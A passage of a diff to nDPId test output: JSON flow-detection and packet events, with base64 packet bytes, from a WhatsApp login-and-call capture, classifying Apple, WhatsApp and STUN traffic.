AiFKkSgXEh3w0kC\/x4kpimxmzxtGXOOQBZWNBgxyNTYgb0Sf9nOE+sqmGbSG7xueIM5u7Dd864xcMPmVsE1VcOkz2PMHbXIHe+roLyX2aqyb6Yu22cChJiPbSlY+mRr9siD+E7u3KnznXJcpEJBSd3utMm4QryOQBR9FCdalU2IyjVmAb148IpK6Ghgjmw7oVrHdCZXaVw+zfL1FhqC9Bd1VFHiBGm211UlGgrjedJW7mv5NM2z0cPLUMCaZycFw6G4KQN6aDAE1rL1eqhrIxxsuhCw0HsrKiJLLdGsa1+3Rf\/uEKt1c0Ng9dAzkrCJEwEwHx3trkLyhj9\/ja7mEqYBSp5Sx0mCtwBbfi6wnI8gTgb3WlgH0Ha3ke8bRCbeKw4dCUR0GSPUQYm4lO6VKKERImy3aoUDOHbtquSKZKUtb1hVt"} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
+01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1432582228504,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":540,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":540,"pkt_l4_len":506,"thread_ts_msec":1432582228504,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIO1F9AAEAGq2HAqAIEEW7lDsApFGe4aFEm1IsaTIAYIACssAAAAQEICi36MxJvhmvfY2JtdD6CZ3s26zaizYDBa1\/xV9+nfluOxtxa1tx195Jafsz52yXEOESrPvfo4L8JAAp0DYIaansHyOlB83T10iMEgMWpntVaGhVYz7Ui4c09FkbWN9q+65\/aqUq4TUrgzMyqE5QUWhXZSc\/uGC0icKHu+b2FL4NHGUs7nYDs8Xc0v0flHk5486jecRIc\/ROiqHyACG3C0wwDLYD5dPHsc+oO3YTdMQHp\/Y5aWShkoF9bF0dA6YegCOYLbVQKFU7DAdWxqhRRjje8xXf+tC7iVD+agcMxzHZHBdPvzUlsa6Hnp2KvOrzs9LBI3\/AlWnTDSOZNp+mWgK4MB2zxE5cEBsbimybYF8snsRtPtIBkMUfF1XAd9wg4sSCboXV1ik63xPuzTMdOxIRWWE26PTSksHKRu47JqvdF18Y85LvvQvIIft9jAMxZNM1JpDNK3xHTwcbI8OJ5ZzkwaDArtx1Yo+du+Za4kNeW1j1f7jlL58\/xs\/9pH231BKAPZrpjtiVLnSRVafACBd5M5lgbO1u\/aSBlmIQ\/UK6DM\/jen1DGM+xWiz3ABAYXKSpL6XfsJZ+dpwtcFktAw18x3fF8GSC0\/zgV+SA55WfIkN+qTLtYiq6ct7jHTceCT8cS"} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432582228753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228753,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JuMAAC8Gq7gRbuUOwKgCBBRnwCnUixpMuGhRJoAQAQ6R7QAAAQEICm+GjQ4t+jMS"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582230648,"flow_last_seen":1432582230648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582230648,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1432582230648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582230648,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZppAAEAGvV7AqAIEEa1CZsA0AbuMr4Y\/AAAAALAC\/\/\/iDQAAAgQFtAEDAwQBAQgKLfo7WAAAAAAEAgAA"} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432582230787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582230787,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0jEsAAO8GKLkRrUJmwKgCBAG7wDR81DyUjK+GQIASH\/6qEgAAAgQFoAEDAwQBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1432582230854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582230854,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLotAAEAG9YXAqAIEEa1CZsA0AbuMr4ZAfNQ8lVAQQADKywAA"} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233314,"flow_last_seen":1432582233314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233314,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1432582233314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233314,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0kh5AAEAGATfAqAIEXbqHCMAoAFBgmxszxhyTY4ARIABAdgAAAQEICi36RbdjLQIx"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1432582233380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233380,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewoAADkGX0tduocIwKgCBABQwCjGHJNjYJsbNIAQAebnbwAAAQEICmMteVEt+kW3"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1432582233490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233490,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewsAADkGX0pduocIwKgCBABQwCjGHJNjYJsbNIARAebnAQAAAQEICmMteb4t+kW3"} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233751,"flow_last_seen":1432582233751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233751,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1432582233751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233751,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoI\/dAAEAG3k\/AqAIEEaxkMcAnAbsMJFozPw\/LbVAR\/\/9EkwAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1432582233884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233884,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xIAAO8GmDMRrGQxwKgCBAG7wCc\/D8ttDCRaNFARn\/6kkwAA"} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1432582233926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233926,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoy8lAAEAGNn3AqAIEEaxkMcAnAbsMJFo0Pw\/LblAQ\/\/9EkgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582234869,"flow_last_seen":1432582234869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582234869,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1432582234869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582234869,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAohHZAAEAGfc3AqAIEEaxkNMAeAbsiAVkzu7svv1AR\/\/9OvgAA"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1432582235010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235010,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoaq4AAO4GKZURrGQ0wKgCBAG7wB67uy+\/IgFZNFARn\/6uvgAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1432582235028,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235028,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAosCtAAEAGUhjAqAIEEaxkNMAeAbsiAVk0u7svwFAQ\/\/9OvQAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582235998,"flow_last_seen":1432582235998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582235998,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1432582235998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235998,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLkpAAEAG1AjAqAIEEaxkJcAdAbtiYuGVG2ODH1AR\/\/\/TAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582235999,"flow_last_seen":1432582235999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582235999,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1432582235999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235999,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoEt9AAEAG713AqAIEEaxkO8AcAbueodpQe0gK3VAR\/\/+2UAAA"} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1432582236140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236140,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoyysAAO8GyCYRrGQlwKgCBAG7wB0bY4MfYmLhllARn\/4zAwAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1432582236144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236144,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoKcoAAO4GanIRrGQ7wKgCBAG7wBx7SArdnqHaUVARn\/4WUQAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLwpAAEAG00jAqAIEEaxkJcAdAbtiYuGWG2ODIFAQ\/\/\/TAQAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoODNAAEAGygnAqAIEEaxkO8AcAbueodpRe0gK3lAQ\/\/+2TwAA"} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1432582238790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238790,"pkt":"xiwDYGpkAPS5Jrv0CABFwACarW0AAEARhl7AqAIEHw1kDsk+DZYAhpcUAAMAaiESpEIAAHUQ+ENDH9BeI3lAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
@@ -136,32 +136,32 @@ 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1432582239035,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582239035,"pkt":"APS5Jrv0xiwDYGpkCABFAABIsFoAAFQRjmEfDUYwwKgCBA2WyT4ANL3lAQMAGCESpEIAACUBlIyWX5N55xQAIAAIAAGRdm4xsYdAAgAIAAABTYyOMrg="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1432582239055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582239055,"pkt":"APS5Jrv0xiwDYGpkCABFAABI6QYAAFMRTSUfDU\/AwKgCBA2WyT4ANHa7AQMAGCESpEIAADsyhsRFd5d2aQUAIAAIAAGRdm4xsYdAAgAIAAABTYyOMuQ="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1432582239083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582239083,"pkt":"APS5Jrv0xiwDYGpkCABFAABIAeoAAFYRK9IfDVUwwKgCBA2WyT4ANFR5AQMAGCESpEIAADIU0Oi5cQTqY2QAIAAIAAGRdm4xsYdAAgAIAAABTYyOMuM="} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582244297,"flow_last_seen":1432582244297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582244297,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1432582244297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244297,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAojkRAAEAGShnAqAIEEaeOH8AMAbt6TdZMbFoWmFAR\/\/+4DAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1432582244435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244435,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoqu8AAO0GwG0Rp44fwKgCBAG7wAxsWhaYek3WTVARn\/4YDQAA"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244462,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoPbFAAEAGmqzAqAIEEaeOH8AMAbt6TdZNbFoWmVAQ\/\/+4CwAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582245413,"flow_last_seen":1432582245413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582245413,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1432582245413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245413,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAodlRAAEAGjBvAqAIEEaxkCMAPAbv4S5DjkuqnU1AR\/\/\/yOgAA"} 
